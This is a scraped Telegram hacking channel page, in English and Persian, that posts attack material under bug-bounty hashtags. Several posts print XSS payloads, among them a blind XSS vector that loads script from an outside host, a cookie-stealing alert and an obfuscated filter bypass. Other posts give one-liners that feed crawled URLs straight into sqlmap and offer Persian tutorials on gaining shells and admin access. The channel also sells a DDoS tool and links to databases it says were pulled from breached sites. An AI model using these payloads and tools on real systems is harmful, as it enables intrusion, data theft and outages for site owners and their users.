Eʀᴏ ··ʜᴀᴄᴋ··
@EroHack0
4.83K subscribers
65 photos
27 videos
10 files
105 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
About
Blog
Apps
Platform
Join
Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
Eʀᴏ ··ʜᴀᴄᴋ··
Media is too big
VIEW IN TELEGRAM
🔥 معرفی ابزار Scan Ero 🛍

😆توضیحات:
شما میتوانید با استفاده از ابزار بالا سایت مورد نظر خودتون رو اسکن کنید ip سایت رو پیدا کنید و غیره حتی میتونید پنل ادمین سایت روهم پیدا کنید.☠️

💬 @GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1063👍2👎1🤯1
1.61K views
Eʀᴏ ··ʜᴀᴄᴋ··
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥932
1.51K views
Eʀᴏ ··ʜᴀᴄᴋ··
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
933👍1
1.42K views
Eʀᴏ ··ʜᴀᴄᴋ··
🆕 SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"


#Sqlmap #BugBounty

🔥@EroHack
🙏Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍105431🔥1🗿1
1.8K views
Eʀᴏ ··ʜᴀᴄᴋ··
👍1222🔥1🗿11
1.66K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔝پیش به سوی ۱۰۰۰ تایی شدن و فراتر از آن

🔥به هزار تا برسیم تازه مسابقه های چنل استارت میخوره🔥

💥 ری اکشن فراموش نشه 💥
Please open Telegram to view this post
VIEW IN TELEGRAM
👍193🔥3🗿33
1.72K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
😈The site has been attacked and some information has been pulled from the database..!


👀Site Address
☠️Download Databases
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥3🗿321
1.6K views
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ··
👺آموزش اسکن سایت با ابزار Wpscan👺 توضیحات: با استفاده از ابزار Wpscan میتونید تمام سایت های وردپرسی رو اسکن کنید و با سویچ هایی که این ابزار داره اطلاعات دقیق تری از سایت جمع آوری کنید.
This media is not supported in your browser
VIEW IN TELEGRAM
👍7🤣321
1.32K views
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ··
👻آموزش هک سایت با باگ RFU👻 توضیحات: شما با استفاده از این باگ رایج میتونید خیلی راحت به سایت مورد نظرتون حمله کنید و دسترسی شل بگیرید.
This media is not supported in your browser
VIEW IN TELEGRAM
🔥8👍2🗿221
1.62K views
Eʀᴏ ··ʜᴀᴄᴋ··
☠️Intrusion into the database and finding information in the database can download and use the link below.


🌐 Site Address
🤡 Download Database
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯9🔥43🤣1
1.79K views
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ·· pinned a voice message
Eʀᴏ ··ʜᴀᴄᴋ··
Media is too big
VIEW IN TELEGRAM
🙂دسترسی به پنل ادمین - باگ SSRF🙂

🤔 توضحیات:
با استفاده از باگ ssrf میتونید به پنل ادمین دسترسی پیدا کنید و یکی از محبوب باگ برای هکرا در تست نفوذ است.

👾قسمت اول👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👍114🤯3
1.94K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
😎ابزار های ما:
🔥Ero-Hash
(شما با استفاده ابزار بالا که در نسخه تقدیم به شما میشه میتونید هش های خودتون رو به صورت تکی یا لیست کرک کنید)
💥DDos Ero
(با استفاده از این ابزار شما میتونید حمله سنگین دیداس رو روی سایت مورد نظرتون پیاده سازی کنید و سایت رو از دسترس خارج کنید)

Scan Ero
(با استفاده از ابزار اسکن یرو شما میتونید سایت مورد نظرتون رو اسکن کنید و میتونید بجز اسکن و پیدا کردن ای‌پی و... میتونید پنل ادمین روهم پیدا کنید)

‼️برای دریافت اطلاعات بیشتر و قیمت به ایدی زیر پیام بدید.
📌@GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
10🔥4🤯4
1.7K views
Eʀᴏ ··ʜᴀᴄᴋ··
😠یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید

Link

#writeup
——————‌
@EroHack
☝️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯95👍3🔥1
1.88K views
Eʀᴏ ··ʜᴀᴄᴋ··
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
➡️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
1.79K views
Eʀᴏ ··ʜᴀᴄᴋ··
SQLMap from Waybackurls ⚰️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"


#sql #sql_injection
——————‌
➡️@EroHack0
🙏Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🗿3🤯21
1.6K views
Eʀᴏ ··ʜᴀᴄᴋ··
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
✔️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
7🤯4
1.71K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍9🗿21
2.87K views
Eʀᴏ ··ʜᴀᴄᴋ··
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید

- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمی‌خواستید منتظر بمونید تا سیستمتون ری‌استارت بشه کافیه زمانی که صفحه ری‌استارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥21
2.86K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔖Backup Files Finder

A Nuclei template that allows you to search for backup files on your target's website.


😴Github: 🔗Link

#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
2.64K views